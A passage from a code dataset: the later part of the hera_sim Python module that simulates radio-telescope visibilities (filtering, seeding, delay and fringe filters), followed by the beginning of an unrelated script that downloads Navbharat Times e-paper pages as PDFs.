ref_files=ref_files,\n Nint_per_file=Nint_per_file,\n prefix=prefix,\n sky_cmp=sky_cmp,\n state=state,\n filetype=filetype,\n clobber=clobber,\n )\n\n # -------------- Legacy Functions -------------- #\n @_add_depr\n def add_eor(self, model, **kwargs):\n \"\"\"Add an EoR-like model to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_foregrounds(self, model, **kwargs):\n \"\"\"Add foregrounds to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_noise(self, model, **kwargs):\n \"\"\"Add thermal noise to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_rfi(self, model, **kwargs):\n \"\"\"Add RFI to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_gains(self, **kwargs):\n \"\"\"Apply bandpass gains to the visibilities.\"\"\"\n return self.add(\"gains\", **kwargs)\n\n @_add_depr\n def add_sigchain_reflections(self, ants=None, **kwargs):\n \"\"\"Apply reflections to the visibilities. See :meth:`add` for details.\"\"\"\n if ants is not None:\n kwargs.update(vis_filter=ants)\n return self.add(\"reflections\", **kwargs)\n\n @_add_depr\n def add_xtalk(self, model=\"gen_whitenoise_xtalk\", bls=None, **kwargs):\n \"\"\"Add crosstalk to the visibilities. See :meth:`add` for more details.\"\"\"\n if bls is not None:\n kwargs.update(vis_filter=bls)\n return self.add(model, **kwargs)\n\n @staticmethod\n def _apply_filter(vis_filter, ant1, ant2, pol):\n \"\"\"Determine whether to filter the visibility for (ant1, ant2, pol).\n\n Functionally, ``vis_filter`` specifies which (ant1, ant2, pol) tuples\n will have a simulated effect propagated through the ``_iteratively_apply``\n method. ``vis_filter`` acts as a logical equivalent of a passband filter.\n\n Parameters\n ----------\n vis_filter\n Either a polarization string, antenna number, baseline, antpairpol\n (baseline + polarization), collection of antenna numbers and/or\n polarization strings, or collection of such keys.\n ant1, ant2, pol\n Baseline + polarization to compare against the provided filter.\n\n Returns\n -------\n apply_filter\n False if the provided antpairpol satisfies any of the keys provided\n in ``vis_filter``; True otherwise. See examples for details.\n\n Examples\n --------\n ``vis_filter`` = (0,)\n returns: False for any baseline including antenna 0\n result: only baselines including antenna 0 have a simulated effect applied.\n\n ``vis_filter`` = ('xx',)\n returns: False if ``pol == \"xx\"`` else True\n result: only polarization \"xx\" has a simulated effect applied.\n\n ``vis_filter`` = (0, 1, 'yy')\n returns: False if ``(ant1, ant2, pol) in [(0, 1, 'yy'), (1, 0, 'yy)]``\n result: only baseline (0,1), or its conjugate, with polarization \"yy\" will\n have a simulated effect applied.\n \"\"\"\n # If multiple keys are passed, do this recursively...\n multikey = any(isinstance(key, (list, tuple)) for key in vis_filter)\n if multikey:\n apply_filter = [\n Simulator._apply_filter(key, ant1, ant2, pol) for key in vis_filter\n ]\n return all(apply_filter) # and approve if just one key fits.\n elif all(item is None for item in vis_filter):\n # Support passing a list of None.\n return False\n elif len(vis_filter) == 1:\n # For now, assume a string specifies a polarization.\n if isinstance(vis_filter[0], str):\n return not pol == vis_filter[0]\n # Otherwise, assume that this specifies an antenna.\n else:\n return not vis_filter[0] in (ant1, ant2)\n elif len(vis_filter) == 2:\n # TODO: This will need to be updated when we support ant strings.\n # Three cases: two pols; an ant+pol; a baseline.\n # If it's two polarizations, then make sure this pol is one of them.\n if all(isinstance(key, str) for key in vis_filter):\n return pol not in vis_filter\n # If it's an ant+pol, make sure both the antenna and pol are present.\n elif any(isinstance(key, str) for key in vis_filter):\n return not all(key in (ant1, ant2, pol) for key in vis_filter)\n # Otherwise, make sure the baseline is correct.\n else:\n return not (\n utils._listify(vis_filter) == [ant1, ant2]\n or utils._listify(vis_filter) == [ant2, ant1]\n )\n elif len(vis_filter) == 3:\n # Assume it's a proper antpairpol.\n return not (\n utils._listify(vis_filter) == [ant1, ant2, pol]\n or utils._listify(vis_filter) == [ant2, ant1, pol]\n )\n else:\n # Assume it's some list of antennas/polarizations.\n pols = []\n ants = []\n for key in vis_filter:\n if isinstance(key, str):\n pols.append(key)\n elif type(key) is int:\n ants.append(key)\n # We want polarization and ant1 or ant2 in the filter.\n # This would be used in simulating e.g. a few feeds that have an\n # abnormally high system temperature.\n return not (pol in pols and (ant1 in ants or ant2 in ants))\n\n def _calculate_reds(self, tol=1.0):\n \"\"\"Calculate redundant groups and populate class attributes.\"\"\"\n groups, centers, lengths = self.data.get_redundancies(tol=tol)\n self.red_grps = groups\n self.red_vecs = centers\n self.red_lengths = lengths\n\n def _calculate_delay_filters(\n self,\n *,\n standoff: float = 0.0,\n delay_filter_type: Optional[str] = \"gauss\",\n min_delay: Optional[float] = None,\n max_delay: Optional[float] = None,\n normalize: Optional[float] = None,\n ):\n \"\"\"\n Calculate delay filters for each redundant group.\n\n Parameters\n ----------\n standoff\n Extra extent in delay that the filter extends out to in order to\n allow for suprahorizon emission. Should be specified in nanoseconds.\n Default buffer is zero.\n delay_filter_type\n String specifying the filter profile. See :func:`utils.gen_delay_filter`\n for details.\n min_delay\n Minimum absolute delay of the filter, in nanoseconds.\n max_delay\n Maximum absolute delay of the filter, in nanoseconds.\n normalize\n Normalization of the filter such that the output power is the product\n of the input power and the normalization factor.\n\n See Also\n --------\n :func:`utils.gen_delay_filter`\n \"\"\"\n # Note that this is not the most efficient way of caching the filters;\n # however, this is algorithmically very simple--just use one filter per\n # redundant group. This could potentially be improved in the future,\n # but it should work fine for our purposes.\n for red_grp, bl_len in zip(self.red_grps, self.red_lengths):\n bl_len_ns = bl_len / const.c.to(\"m/ns\").value\n bl_int = sorted(red_grp)[0]\n delay_filter = utils.gen_delay_filter(\n self.freqs,\n bl_len_ns,\n standoff=standoff,\n delay_filter_type=delay_filter_type,\n min_delay=min_delay,\n max_delay=max_delay,\n normalize=normalize,\n )\n self._filter_cache[\"delay\"][bl_int] = delay_filter\n\n def _calculate_fringe_filters(\n self,\n *,\n fringe_filter_type: Optional[str] = \"tophat\",\n **filter_kwargs,\n ):\n \"\"\"\n Calculate fringe-rate filters for all baselines.\n\n Parameters\n ----------\n fringe_filter_type\n The fringe-rate filter profile.\n filter_kwargs\n Other parameters necessary for specifying the filter. These\n differ based on the filter profile.\n\n See Also\n --------\n :func:`utils.gen_fringe_filter`\n \"\"\"\n # This uses the same simplistic approach as the delay filter\n # calculation does--just do one filter per redundant group.\n for red_grp, (blx, _bly, _blz) in zip(self.red_grps, self.red_vecs):\n ew_bl_len_ns = blx / const.c.to(\"m/ns\").value\n bl_int = sorted(red_grp)[0]\n fringe_filter = utils.gen_fringe_filter(\n self.lsts,\n self.freqs,\n ew_bl_len_ns,\n fringe_filter_type=fringe_filter_type,\n **filter_kwargs,\n )\n self._filter_cache[\"fringe\"][bl_int] = fringe_filter\n\n def _initialize_data(\n self,\n data: Optional[Union[str, Path, UVData]],\n **kwargs,\n ):\n \"\"\"\n Initialize the ``data`` attribute with a ``UVData`` object.\n\n Parameters\n ----------\n data\n Either a ``UVData`` object or a path-like object to a file\n that can be loaded into a ``UVData`` object. If not provided,\n then sufficient keywords for initializing a ``UVData`` object\n must be provided. See :func:`io.empty_uvdata` for more\n information on which keywords are needed.\n\n Raises\n ------\n TypeError\n If the provided value for ``data`` is not an object that can\n be cast to a ``UVData`` object.\n \"\"\"\n if data is None:\n self.data = io.empty_uvdata(**kwargs)\n elif isinstance(data, (str, Path)):\n self.data = self._read_datafile(data, **kwargs)\n self.data.extra_keywords[\"data_file\"] = data\n elif isinstance(data, UVData):\n self.data = data\n else:\n raise TypeError(\n \"data type not understood. Only a UVData object or a path to \"\n \"a UVData-compatible file may be passed as the data parameter. \"\n \"Otherwise, keywords must be provided to build a UVData object.\"\n )\n\n if not self.data.future_array_shapes: # pragma: nocover\n self.data.use_future_array_shapes()\n\n def _initialize_args_from_model(self, model):\n \"\"\"\n Retrieve the LSTs and/or frequencies required for a model.\n\n Parameters\n ----------\n model: callable\n Model whose argspec is to be inspected and recovered.\n\n Returns\n -------\n model_params: dict\n Dictionary mapping positional argument names to either an\n ``inspect._empty`` object or the relevant parameters pulled\n from the ``Simulator`` object. The only parameters that are\n not ``inspect._empty`` are \"lsts\" and \"freqs\", should they\n appear in the model's argspec.\n\n Examples\n --------\n Suppose we have the following function::\n\n def func(freqs, ants, other=None):\n pass\n\n The returned object would be a dictionary with keys ``freqs`` and\n ``ants``, with the value for ``freqs`` being ``self.freqs`` and\n the value for ``ants`` being ``inspect._empty``. Since ``other``\n has a default value, it will not be in the returned dictionary.\n \"\"\"\n model_params = self._get_model_parameters(model)\n model_params = {\n k: v\n for k, v in model_params.items()\n if v is inspect._empty or k in model.attrs_to_pull\n }\n\n # Pull any attributes from the Simulator that are required.\n args = {}\n for param, value in model_params.items():\n if hasattr(self, param) and value in (None, inspect._empty):\n args[param] = getattr(self, param)\n\n model_params.update(args)\n\n return model_params\n\n def _iterate_antpair_pols(self):\n \"\"\"Loop through all baselines and polarizations.\"\"\"\n for ant1, ant2, pol in self.data.get_antpairpols():\n blt_inds = self.data.antpair2ind((ant1, ant2))\n pol_ind = self.data.get_pols().index(pol)\n if blt_inds.size:\n yield ant1, ant2, pol, blt_inds, pol_ind\n\n def _iteratively_apply(\n self,\n model: SimulationComponent,\n *,\n add_vis: bool = True,\n ret_vis: bool = False,\n seed: Optional[Union[str, int]] = None,\n vis_filter: Optional[Sequence] = None,\n antpairpol_cache: Optional[Sequence[AntPairPol]] = None,\n **kwargs,\n ) -> Optional[Union[np.ndarray, dict[int, np.ndarray]]]:\n \"\"\"\n Simulate an effect for an entire array.\n\n This method loops over every baseline and polarization in order\n to simulate the effect ``model`` for the full array. The result\n is optionally applied to the simulation's data and/or returned.\n\n Parameters\n ----------\n model\n Callable model used to simulate an effect.\n add_vis\n Whether to apply the effect to the simulation data. Default\n is to apply the effect.\n ret_vis\n Whether to return the simulated effect. Default is to not\n return the effect. Type of returned object depends on whether\n the effect is multiplicative or not.\n seed\n Either an integer specifying the seed to be used in setting\n the random state, or one of a select few keywords. Default\n is to use the current random state. See :meth:`_seed_rng`\n for descriptions of the supported seeding modes.\n vis_filter\n List of antennas, baselines, polarizations, antenna-polarization\n pairs, or antpairpols for which to simulate the effect. This\n specifies which of the above the effect is to be simulated for,\n and anything that does not meet the keys specified in this list\n does not have the effect applied to it. See :meth:`_apply_filter`\n for more details.\n antpairpol_cache\n List of (ant1, ant2, pol) tuples specifying which antpairpols have\n already had the effect simulated. Not intended for use by the\n typical end-user.\n kwargs\n Extra parameters passed to ``model``.\n\n Returns\n -------\n effect: np.ndarray or dict\n The simulated effect. Only returned if ``ret_vis`` is set to True.\n If the effect is *not* multiplicative, then the returned object\n is an ndarray; otherwise, a dictionary mapping antenna numbers\n to ndarrays is returned.\n \"\"\"\n # There's nothing to do if we're neither adding nor returning.\n if not add_vis and not ret_vis:\n warnings.warn(\n \"You have chosen to neither add nor return the effect \"\n \"you are trying to simulate, so nothing will be \"\n f\"computed. This warning was raised for the model: {model}\",\n stacklevel=2,\n )\n return\n\n # Initialize the antpairpol cache if we need to.\n if antpairpol_cache is None:\n antpairpol_cache = []\n\n # Pull relevant parameters from Simulator.\n # Also make placeholders for antenna/baseline dependent parameters.\n base_args = self._initialize_args_from_model(model)\n\n # Get a copy of the data array.\n data_copy = self.data.data_array.copy()\n\n # Pull useful auxilliary parameters.\n is_multiplicative = getattr(model, \"is_multiplicative\", None)\n is_smooth_in_freq = getattr(model, \"is_smooth_in_freq\", True)\n if is_multiplicative is None:\n warnings.warn(\n \"You are attempting to compute a component but have \"\n \"not specified an ``is_multiplicative`` attribute for \"\n \"the component. The component will be added under \"\n \"the assumption that it is *not* multiplicative.\",\n stacklevel=2,\n )\n is_multiplicative = False\n\n # Pre-simulate gains.\n if is_multiplicative:\n gains = {}\n args = self._update_args(base_args, model)\n args.update(kwargs)\n for pol in self.data.get_feedpols():\n if seed:\n seed = self._seed_rng(seed, model, pol=pol)\n polarized_gains = model(**args)\n for ant, gain in polarized_gains.items():\n gains[(ant, pol)] = gain\n\n # Determine whether to use cached filters, and which ones to use if so.\n model_kwargs = getattr(model, \"kwargs\", {})\n use_cached_filters = any(\"filter\" in key for key in model_kwargs)\n get_delay_filter = (\n is_smooth_in_freq\n and \"delay_filter_kwargs\" not in kwargs\n and \"delay_filter_kwargs\" in model_kwargs\n and bool(self._filter_cache[\"delay\"])\n )\n get_fringe_filter = (\n \"fringe_filter_kwargs\" not in kwargs\n and \"fringe_filter_kwargs\" in model_kwargs\n and bool(self._filter_cache[\"fringe\"])\n )\n use_cached_filters &= get_delay_filter or get_fringe_filter\n\n if model.return_type == \"full_array\":\n args = self._update_args(base_args, model)\n args.update(kwargs)\n data_copy += model(**args)\n else:\n # Iterate over the array and simulate the effect as-needed.\n for ant1, ant2, pol, blt_inds, pol_ind in self._iterate_antpair_pols():\n # Determine whether or not to filter the result.\n apply_filter = self._apply_filter(\n utils._listify(vis_filter), ant1, ant2, pol\n )\n if apply_filter:\n continue\n\n # Check if this antpairpol or its conjugate have been simulated.\n bl_in_cache = (ant1, ant2, pol) in antpairpol_cache\n conj_in_cache = (ant2, ant1, pol) in antpairpol_cache\n\n # Seed the random number generator.\n key = (ant2, ant1, pol) if conj_in_cache else (ant1, ant2, pol)\n seed = self._seed_rng(seed, model, *key)\n\n # Prepare the actual arguments to be used.\n use_args = self._update_args(base_args, model, ant1, ant2, pol)\n use_args.update(kwargs)\n if use_cached_filters:\n filter_kwargs = self._get_filters(\n ant1,\n ant2,\n get_delay_filter=get_delay_filter,\n get_fringe_filter=get_fringe_filter,\n )\n use_args.update(filter_kwargs)\n\n # Cache simulated antpairpols if not filtered out.\n if not (bl_in_cache or conj_in_cache or apply_filter):\n antpairpol_cache.append((ant1, ant2, pol))\n\n # Check whether we're simulating a gain or a visibility.\n if is_multiplicative:\n # Calculate the complex gain, but only apply it if requested.\n gain = gains[(ant1, pol[0])] * np.conj(gains[(ant2, pol[1])])\n data_copy[blt_inds, :, pol_ind] *= gain\n else:\n # I don't think this will ever be executed, but just in case...\n if conj_in_cache and seed is None: # pragma: no cover\n conj_blts = self.data.antpair2ind((ant2, ant1))\n vis = (data_copy - self.data.data_array)[\n conj_blts, :, pol_ind\n ].conj()\n else:\n vis = model(**use_args)\n\n # and add it in\n data_copy[blt_inds, :, pol_ind] += vis\n\n # return the component if desired\n # this is a little complicated, but it's done this way so that\n # there aren't *three* copies of the data array floating around\n # this is to minimize the potential of triggering a MemoryError\n if ret_vis:\n # return the gain dictionary if gains are simulated\n if is_multiplicative:\n return gains\n data_copy -= self.data.data_array\n # the only time we're allowed to have add_vis be False is\n # if ret_vis is True, and nothing happens if both are False\n # so this is the *only* case where we'll have to reset the\n # data array\n if add_vis:\n self.data.data_array += data_copy\n # otherwise return the actual visibility simulated\n return data_copy\n else:\n self.data.data_array = data_copy\n\n @staticmethod\n def _read_datafile(datafile: Union[str, Path], **kwargs) -> UVData:\n \"\"\"Read a file as a ``UVData`` object.\n\n Parameters\n ----------\n datafile\n Path to a file containing visibility data readable by ``pyuvdata``.\n **kwargs\n Arguments passed to the ``UVData.read`` method.\n\n Returns\n -------\n UVData\n The read-in data object.\n \"\"\"\n uvd = UVData()\n uvd.read(datafile, read_data=True, **kwargs)\n return uvd\n\n def _seed_rng(self, seed, model, ant1=None, ant2=None, pol=None):\n \"\"\"\n Set the random state according to the provided parameters.\n\n This is a helper function intended to be used solely in the\n :meth:`_iteratively_apply` method. It exists in order to ensure that\n the simulated data is as realistic as possible, assuming the user\n understands the proper choice of seeding method to use for the\n various effects that can be simulated.\n\n Parameters\n ----------\n seed\n Either the random seed to use (when provided as an integer),\n or one of the following keywords:\n\n ``\"once\"``:\n The random state is set to the same value for\n every baseline and polarization; one unique seed is\n created for each model that uses this seeding mode.\n This is recommended for simulating point-source foregrounds\n and per-antenna effects.\n ``\"redundant\"``:\n The random state is only uniquely set once per redundant\n group for a given model. This is recommended for simulating\n diffuse foregrounds and the reionization signal.\n ``\"initial\"``:\n The random state is set at the very beginning of the\n iteration over the array. This is essentially the same as\n using a seeding mode of ``None``, though not identical.\n This is recommended for simulating thermal noise, or for\n simulating an effect that has a random component that\n changes between baselines.\n\n model\n Name of the model for which to either recover or cache the seed.\n This is used to lookup random state seeds in the :attr:`_seeds`\n dictionary.\n ant1\n First antenna in the baseline.\n ant2\n Second antenna in the baseline (for baseline-dependent effects).\n pol\n Polarization string.\n\n Returns\n -------\n updated_seed\n Either the input seed or ``None``, depending on the provided seed.\n This is just used to ensure that the logic for setting the random\n state in the :meth:`_iteratively_apply` routine works out.\n\n Raises\n ------\n TypeError\n The provided seed is not ``None``, an integer, or a string.\n ValueError\n Two cases: one, the ``\"redundant\"`` seeding mode is being used\n and a baseline isn't provided; two, the seed is a string, but\n is not one of the supported seeding modes.\n \"\"\"\n if seed is None:\n return\n if type(seed) is int:\n np.random.seed(seed)\n return seed\n if not isinstance(seed, str):\n raise TypeError(\n \"The seeding mode must be specified as a string or integer. \"\n \"If an integer is provided, then it will be used as the seed.\"\n )\n if seed == \"redundant\":\n if ant1 is None or ant2 is None:\n raise ValueError(\n \"A baseline must be specified in order to \"\n \"seed by redundant group.\"\n )\n # Determine the key for the redundant group this baseline is in.\n bl_int = self.data.antnums_to_baseline(ant1, ant2)\n key = (next(reds for reds in self.red_grps if bl_int in reds)[0],)\n if pol:\n key += (pol,)\n # seed the RNG accordingly\n np.random.seed(self._get_seed(model, key))\n return \"redundant\"\n elif seed == \"once\":\n # this option seeds the RNG once per iteration of\n # _iteratively_apply, using the same seed every time\n # this is appropriate for antenna-based gains (where the\n # entire gain dictionary is simulated each time), or for\n # something like PointSourceForeground, where objects on\n # the sky are being placed randomly\n key = (pol,) if pol else 0\n np.random.seed(self._get_seed(model, key))\n return \"once\"\n elif seed == \"initial\":\n # this seeds the RNG once at the very beginning of\n # _iteratively_apply. this would be useful for something\n # like ThermalNoise\n key = (pol,) if pol else -1\n np.random.seed(self._get_seed(model, key))\n return None\n else:\n raise ValueError(\"Seeding mode not supported.\")\n\n def _update_args(self, args, model, ant1=None, ant2=None, pol=None):\n \"\"\"\n Scan the provided arguments and pull data as necessary.\n\n This method searches the provided dictionary for various positional\n arguments that can be determined by data stored in the ``Simulator``\n instance. Please refer to the source code to see what argument\n names are searched for and how their values are obtained.\n\n Parameters\n ----------\n args: dict\n Dictionary mapping names of positional arguments to either\n a value pulled from the ``Simulator`` instance or an\n ``inspect._empty`` object. See .. meth: _initialize_args_from_model\n for details on what to expect (these two methods are always\n called in conjunction with one another).\n model: SimulationComponent\n The model being simulated. The model will define which attributes\n should be pulled from the ``Simulator``.\n ant1: int, optional\n Required parameter if an autocorrelation visibility or a baseline\n vector is in the keys of ``args``.\n ant2: int, optional\n Required parameter if a baseline vector is in the keys of ``args``.\n pol: str, optional\n Polarization string. Currently not used.\n \"\"\"\n # TODO: review this and see if there's a smarter way to do it.\n new_params = {}\n for param, attr in model.attrs_to_pull.items():\n if param in (\"autovis\", \"autovis_i\"):\n new_params[param] = self.data.get_data(ant1, ant1, pol)\n elif param == \"autovis_j\":\n new_params[param] = self.data.get_data(ant2, ant2, pol)\n elif param == \"bl_vec\":\n bl_vec = self.antpos[ant2] - self.antpos[ant1]\n new_params[param] = bl_vec / const.c.to(\"m/ns\").value\n elif param == \"antpair\":\n new_params[param] = (ant1, ant2)\n else:\n # The parameter can be retrieved directly from the Simulator\n new_params[param] = getattr(self, attr)\n\n use_args = args.copy()\n use_args.update(new_params)\n return use_args\n\n def _get_filters(\n self,\n ant1: int,\n ant2: int,\n *,\n get_delay_filter: bool = True,\n get_fringe_filter: bool = True,\n ) -> dict[str, np.ndarray]:\n \"\"\"\n Retrieve delay and fringe filters from the cache.\n\n Parameters\n ----------\n ant1\n First antenna in the baseline.\n ant2\n Second antenna in the baseline.\n get_delay_filter\n Whether to retrieve the delay filter.\n get_fringe_filter\n Whether to retrieve the fringe filter.\n\n Returns\n -------\n filters\n Dictionary containing the fringe and delay filters that\n have been pre-calculated for the provided baseline.\n \"\"\"\n filters = {}\n if not get_delay_filter and not get_fringe_filter:\n # Save some CPU cycles.\n return filters\n bl_int = self.data.antnums_to_baseline(ant1, ant2)\n conj_bl_int = self.data.antnums_to_baseline(ant2, ant1)\n is_conj = False\n for red_grp in self.red_grps:\n if bl_int in red_grp:\n key = sorted(red_grp)[0]\n break\n if conj_bl_int in red_grp:\n key = sorted(red_grp)[0]\n is_conj = True\n break\n if get_delay_filter:\n delay_filter = self._filter_cache[\"delay\"][key]\n filters[\"delay_filter_kwargs\"] = {\"delay_filter\": delay_filter}\n if get_fringe_filter:\n fringe_filter = self._filter_cache[\"fringe\"][key]\n if is_conj:\n # Fringes are seen to move in the opposite direction.\n fringe_filter = fringe_filter[::-1, :]\n filters[\"fringe_filter_kwargs\"] = {\"fringe_filter\": fringe_filter}\n return filters\n\n @staticmethod\n def _get_model_parameters(model):\n \"\"\"Retrieve the full model signature (init + call) parameters.\"\"\"\n init_params = inspect.signature(model.__class__).parameters\n call_params = inspect.signature(model).parameters\n # this doesn't work correctly if done on one line\n model_params = {}\n for params in (call_params, init_params):\n for parameter, value in params.items():\n model_params[parameter] = value.default\n model_params.pop(\"kwargs\", None)\n return model_params\n\n @staticmethod\n def _get_component(\n component: Union[str, type[SimulationComponent], SimulationComponent]\n ) -> Union[SimulationComponent, type[SimulationComponent]]:\n \"\"\"Normalize a component to be either a class or instance.\"\"\"\n if np.issubclass_(component, SimulationComponent):\n return component\n elif isinstance(component, str):\n try:\n return get_model(component)\n except KeyError:\n raise ValueError(\n f\"The model {component!r} does not exist. The following models are \"\n f\"available: \\n{list_all_components()}.\"\n )\n elif isinstance(component, SimulationComponent):\n return component\n else:\n raise TypeError(\n \"The input type for the component was not understood. \"\n \"Must be a string, or a class/instance of type 'SimulationComponent'. \"\n f\"Available component models are:\\n{list_all_components()}\"\n )\n\n def _generate_seed(self, model, key):\n \"\"\"Generate a random seed based on the current time.\n\n Populate the ``_seeds`` dictionary appropriately with the result.\n \"\"\"\n model = self._get_model_name(model)\n # for the sake of randomness\n np.random.seed(int(time.time() * 1e6) % 2**32)\n if model not in self._seeds:\n self._seeds[model] = {}\n self._seeds[model][key] = np.random.randint(2**32)\n\n def _get_seed(self, model, key):\n \"\"\"Retrieve or generate a random seed given a model and key.\"\"\"\n model = self._get_model_name(model)\n if model not in self._seeds:\n self._generate_seed(model, key)\n if key not in self._seeds[model]:\n self._generate_seed(model, key)\n return self._seeds[model][key]\n\n @staticmethod\n def _get_model_name(model):\n \"\"\"Find out the (lowercase) name of a provided model.\"\"\"\n if isinstance(model, str):\n return model.lower()\n elif np.issubclass_(model, SimulationComponent):\n return model.__name__.lower()\n elif isinstance(model, SimulationComponent):\n return model.__class__.__name__.lower()\n else:\n raise TypeError(\n \"You are trying to simulate an effect using a custom function. \"\n \"Please refer to the tutorial for instructions regarding how \"\n \"to define new simulation components compatible with the Simulator.\"\n )\n\n def _parse_key(self, key: Union[int, str, AntPair, AntPairPol]) -> AntPairPol:\n \"\"\"Convert a key of at-most length-3 to an (ant1, ant2, pol) tuple.\"\"\"\n if key is None:\n ant1, ant2, pol = None, None, None\n elif np.issubdtype(type(key), int):\n # Figure out if it's an antenna or baseline integer\n if key in self.antpos:\n ant1, ant2, pol = key, None, None\n else:\n ant1, ant2 = self.data.baseline_to_antnums(key)\n pol = None\n elif isinstance(key, str):\n if key.lower() in (\"auto\", \"cross\"):\n raise NotImplementedError(\"Functionality not yet supported.\")\n ant1, ant2, pol = None, None, key\n else:\n try:\n iter(key)\n if len(key) not in (2, 3):\n raise TypeError\n except TypeError:\n raise ValueError(\n \"Key must be an integer, string, antenna pair, or antenna \"\n \"pair with a polarization string.\"\n )\n if len(key) == 2:\n if all(type(val) is int for val in key):\n ant1, ant2 = key\n pol = None\n else:\n ant1, pol = key\n ant2 = None\n else:\n ant1, ant2, pol = key\n return ant1, ant2, pol\n\n def _sanity_check(self, model):\n \"\"\"Check that simulation components are applied sensibly.\"\"\"\n has_data = not np.all(self.data.data_array == 0)\n is_multiplicative = getattr(model, \"is_multiplicative\", False)\n contains_multiplicative_effect = any(\n self._get_component(component[\"alias\"]).is_multiplicative\n for component in self._components.values()\n )\n\n if is_multiplicative and not has_data:\n warnings.warn(\n \"You are trying to compute a multiplicative \"\n \"effect, but no visibilities have been simulated yet.\",\n stacklevel=1,\n )\n elif not is_multiplicative and contains_multiplicative_effect:\n warnings.warn(\n \"You are adding visibilities to a data array \"\n \"*after* multiplicative effects have been introduced.\",\n stacklevel=1,\n )\n\n def _update_history(self, model, **kwargs):\n \"\"\"Record the component simulated and its parameters in the history.\"\"\"\n component = self._get_model_name(model)\n vis_filter = kwargs.pop(\"vis_filter\", None)\n msg = f\"hera_sim v{__version__}: Added {component} using parameters:\\n\"\n for param, value in defaults._unpack_dict(kwargs).items():\n msg += f\"{param} = {value}\\n\"\n if vis_filter is not None:\n msg += \"Effect simulated for the following antennas/baselines/pols:\\n\"\n msg += \", \".join(vis_filter)\n self.data.history += msg\n\n def _update_seeds(self, model_name=None):\n \"\"\"Update the seeds in the extra_keywords property.\"\"\"\n seed_dict = {}\n for component, seeds in self._seeds.items():\n if model_name is not None and component != model_name:\n continue\n\n if len(seeds) == 1:\n seed = list(seeds.values())[0]\n key = \"_\".join([component, \"seed\"])\n seed_dict[key] = seed\n else:\n # This should only be raised for seeding by redundancy.\n # Each redundant group is denoted by the *first* baseline\n # integer for the particular redundant group. See the\n # _generate_redundant_seeds method for reference.\n for bl_int, seed in seeds.items():\n key = \"_\".join([component, \"seed\", str(bl_int)])\n seed_dict[key] = seed\n\n # Now actually update the extra_keywords dictionary.\n self.data.extra_keywords.update(seed_dict)\n\n def _validate_get_request(\n self, model: Component, ant1: int, ant2: int, pol: str\n ) -> None:\n \"\"\"Verify that the provided antpairpol is appropriate given the model.\"\"\"\n if getattr(model, \"is_multiplicative\", False):\n pols = self.data.get_feedpols()\n pol_type = \"Feed\"\n else:\n pols = self.pols\n pol_type = \"Visibility\"\n if ant1 is None and ant2 is None:\n if pol is None or pol in pols:\n return\n else:\n raise ValueError(f\"{pol_type} polarization {pol} not found.\")\n\n if pol is not None and pol not in pols:\n raise ValueError(f\"{pol_type} polarization {pol} not found.\")\n\n if getattr(model, \"is_multiplicative\", False):\n if ant1 is not None and ant2 is not None:\n raise ValueError(\n \"At most one antenna may be specified when retrieving \"\n \"a multiplicative effect.\"\n )\n else:\n if (ant1 is None) ^ (ant2 is None):\n raise ValueError(\n \"Either no antennas or a pair of antennas must be provided \"\n \"when retrieving a non-multiplicative effect.\"\n )\n if ant1 not in self.antpos or ant2 not in self.antpos:\n raise ValueError(\"At least one antenna is not in the array layout.\")\n","repo_name":"HERA-Team/hera_sim","sub_path":"hera_sim/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":63166,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"41005200611","text":"from bs4 import BeautifulSoup\nfrom requests import get\nfrom datetime import datetime as dt\nfrom time import sleep\nfrom os import mkdir\nfrom os.path import isdir \nfrom writetofile import write\nfrom mergePDF import merge\nimport re\nclass EPAPER:\n base_url = \"http://epaper.navbharattimes.com\"\n pdf_url = \"http://image.epaper.navbharattimes.com/epaperimages//{date}//{date}-md-{region}-\"\n region = \"de\"\n # region = \"mu\"\n edition = \"13@13\"\n # edition = \"16@16\"\n date = \"{day}@{month}@{year}\"\n nbtepaper = \"/paper/{pgno}-{edition}-{date}-1001.html\"\n paper_path = \"\"\n publishDate = None\n \n def __init__(self, publishDate, edition=None):\n if not isinstance(publishDate, dt):\n print(\"Error: Invalid date entered\")\n return\n\n if edition is not None and self.__is_valid_edition(edition):\n self.edition = edition\n print(\"Status: Setting edition: %s\" % edition)\n\n self.publishDate = publishDate\n date = self.__formatDate(publishDate)\n \n if(len(date) > 0):\n self.date = self.date.format(day=date[\"day\"],month=date[\"month\"],year=date[\"year\"])\n self.paper_path = self.date + \"/\"\n print(\"Status: Date set: \" + self.date)\n else:\n print(\"Error: Could not format date\")\n \n def __is_valid_edition(self, edition):\n pattern = \"^\\d{1,2}@\\d{2}$\"\n a = re.search(pattern, edition)\n return a != None\n \n def get_paper_path(self):\n return self.paper_path\n\n def __formatDate(self, date):\n d = {}\n if date is not None:\n d[\"day\"] = \"{:02d}\".format(date.day)\n d[\"month\"] = \"{:02d}\".format(date.month)\n d[\"year\"] = \"{:04d}\".format(date.year)\n else:\n print(\"Error: Invalid date argument passed\")\n return d\n\n def downloadPaper(self, count=-1):\n count += 1\n if count > 2:\n print(\"Error: Unable to download newspaper for this date\")\n return False\n response = get(\n self.base_url +\n self.nbtepaper.format(\n pgno=1,\n edition=self.edition,\n date=self.date\n )\n )\n if response.status_code == 200:\n if not isdir(self.paper_path):\n mkdir(self.paper_path)\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n #changed span class from headforpagenext to pagedeselect\n span = soup.findAll(\"span\", {\"class\":\"pagedeselect\"})\n pages = [ int(x.get_text().split(\"-\")[-1]) for x in span]\n if(len(pages) > 0):\n print(\"Total {} pages\".format( len(span) + 1) )\n else:\n print(\"Error: Unable to download newspaper for this date\")\n return False\n return self.__fetch(pages)\n else:\n print(\"Error: could not establish value for page no's, trying again in 5 seconds\")\n self.downloadPaper()\n\n def __generatePDFURL(self,page):\n date = self.__formatDate(self.publishDate)\n datestring = date[\"day\"] + date[\"month\"] + date[\"year\"]\n self.pdf_url = self.pdf_url.format(date=datestring, region=self.region)\n return self.pdf_url + str(page) + \".pdf\"\n\n def __fetch(self, pages):\n for pageno in pages:\n content = None\n while content is None:\n print(\"Status: Fetching page no {} of {}\".format(pageno, len(pages)))\n response = get(\n self.base_url +\n 